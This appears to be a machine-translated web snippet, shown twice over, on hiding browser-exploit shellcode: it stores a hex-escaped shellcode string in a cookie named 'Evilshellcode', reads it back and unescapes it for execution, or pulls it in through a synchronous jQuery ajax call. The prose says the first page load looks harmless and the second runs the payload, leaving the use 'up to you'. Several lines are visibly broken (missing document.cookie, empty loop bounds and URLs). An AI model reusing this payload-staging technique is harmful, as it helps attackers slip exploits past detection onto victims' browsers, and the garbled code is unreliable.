Cookie sample code:
//Storage
function setCookie(sVar, sVal){
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
= theCookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCookie('Evilshellcode', shellcode);
//take out
function getCookie(sVar){
cookies = ('; ');
for(var i = 1; i <= ; i++){
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCookie('Evilshellcode'))
If the cookie is stored, you can hang it twice. The first time you hang the cookie and write the code to the code is harmless. The second time you take it out and run it with the newly hanged code. How to use it is up to you.
ajax to call
<script src="/files/jquery-1.3." type="text/javascript"></script>
var shellcode = $.ajax({
url: "",
async: false
}).responseText
content
%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec
Copy the codeThe code is as follows:
//Storage
function setCookie(sVar, sVal){
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
= theCookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCookie('Evilshellcode', shellcode);
//take out
function getCookie(sVar){
cookies = ('; ');
for(var i = 1; i <= ; i++){
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCookie('Evilshellcode'))
If the cookie is stored, you can hang it twice. The first time you hang the cookie and write the code to the code is harmless. The second time you take it out and run it with the newly hanged code. How to use it is up to you.
ajax to call
Copy the codeThe code is as follows:
<script src="/files/jquery-1.3." type="text/javascript"></script>
var shellcode = $.ajax({
url: "",
async: false
}).responseText
content
%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec